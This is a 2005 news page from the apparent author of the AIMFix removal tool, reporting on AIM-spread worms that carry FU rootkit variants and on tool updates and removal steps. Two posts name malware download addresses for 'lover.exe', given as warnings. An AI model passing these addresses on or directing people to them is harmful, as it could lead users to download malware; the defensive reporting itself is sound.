News Items

Dec 22, 2005 12:44PM

There have been several new variations on the same rootkit mentioned in the past couple news items. If you run into a infecting link, please let me know ASAP, so that I can grab a copy of the infecting file. These files help me build a library of malware, can be used to perform analysis, and are often critical in any investigation into the perpetrators. Be sure to send the actual file link - many of these links are disguised as a link to myspace, but in reality link to a completely different file on a different website.

-Jay

Dec 12, 2005 10:51PM

AIMFix has been updated to handle the previously mentioned items. If you run the current version of AIMFix and it detects a known variant of the FU rootkit and/or the "lover.exe" virus, AIMFix will remove as much as possible, and set itself to run at startup the next time the computer reboots.

AIMFix should run if you reboot into Safe Mode or regular mode, and it will remove any remaining components possible. There were also some minor updates to logging and the profile cleaning. From now on if AIMFix removes a file, it will back up your existing profile to the aimfix_quarantine directory. You can use the quarantined profile to restore old information.

Quarantined profiles will be named in the following format: nnnn_info.htm.bak - where nnnn is any random number. ONLY quarantine files with "info.htm.bak" are profiles. Any other file is a suspected virus file. It is recommended that you open the backed-up profile in notepad or wordpad and copy the information, in case there is any malicious code embedded in the html of the profile.

-Jay

Dec 09, 2005 09:02PM

Well, I have good news, and more good news. First, I just want to say a big thank you Chris for buying me "Rootkits : Subverting the Windows Kernel" from my Amazon wishlist. That will be very helpful in understanding the new types of malware that are becoming prevalent.

Secondly, I have an update on the infosmartme.com infection I mentioned in my previous post. There is a new url being used in addition to the first url: http://69.64.48.229/lover.exe

I have also been able to verify that AIMFix will in fact detect and remove this virus, but it's slightly more involved than most virus/worm variants. The required steps to remove this virus appear to be:

  1. Run AIMFix - it should remove a few files and registry keys
  2. Reboot the computer immediately
  3. Run AIMFix a second time

More research will be done and I will be adding some special code to AIMFix soon to handle this variant, but as far as I can tell so far, the above steps will work.

-Jay

Dec 09, 2005 10:47AM

There is a new virus being spread from http://infosmartme.com/lover.exe

I have contacted the owners of the site and I've been doing my best to analyze the virus file. It appears to contain a variant FU Rootkit again, similar to the lockx.exe fiasco of a few weeks ago. I do not have an update available to AIMFix yet for this particular worm due to the rootkit nature of it.

I may or may not be able to come up with a solution for this item, but it is likely to take some time for me to research removal of the rootkit and see what needs to be done. If you are infected by this virus, the best advice as always is to reformat the computer completely.

I will post any updates to the situation here as they happen. 

-Jay

Dec 07, 2005 11:43AM

A reader sent me a link to an interesting article - it looks like the two main virus variants I've been removing for the past few days have made the news.

-Jay

Archives